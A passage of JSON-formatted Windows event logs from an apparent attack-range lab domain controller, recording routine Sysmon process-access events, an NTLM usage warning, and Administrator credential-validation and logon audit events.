{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1077-5F25-0000-001065260400}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1077-5F25-0000-001065260400}","TargetProcessId":"4004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.020\r\nSourceProcessGUID: {E2A3D6B1-1077-5F25-0000-001065260400}\r\nSourceProcessId: 4004\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.020","SourceProcessGUID":"{E2A3D6B1-1077-5F25-0000-001065260400}","SourceProcessId":"4004","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6038,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76829,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"Microsoft Windows Server has detected that NTLM authentication is presently being used between clients and this server. This event occurs once per boot of the server on the first time a client uses NTLM with this server.\r\n \r\nNTLM is a weaker authentication mechanism. Please check:\r\n \r\n      Which applications are using NTLM authentication?\r\n      Are there configuration issues preventing the use of stronger authentication such as Kerberos authentication?\r\n      If NTLM must be supported, is Extended Protection configured?\r\n \r\nDetails on how to complete these checks can be found at http://go.microsoft.com/fwlink/?LinkId=225699.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.083\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.083","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.083\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.083","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220266,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-8400769\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-8400769","Status":"0x0","EventReceivedTime":"2020-08-01 06:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220267,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220268,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x42839\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x42839","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220269,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon 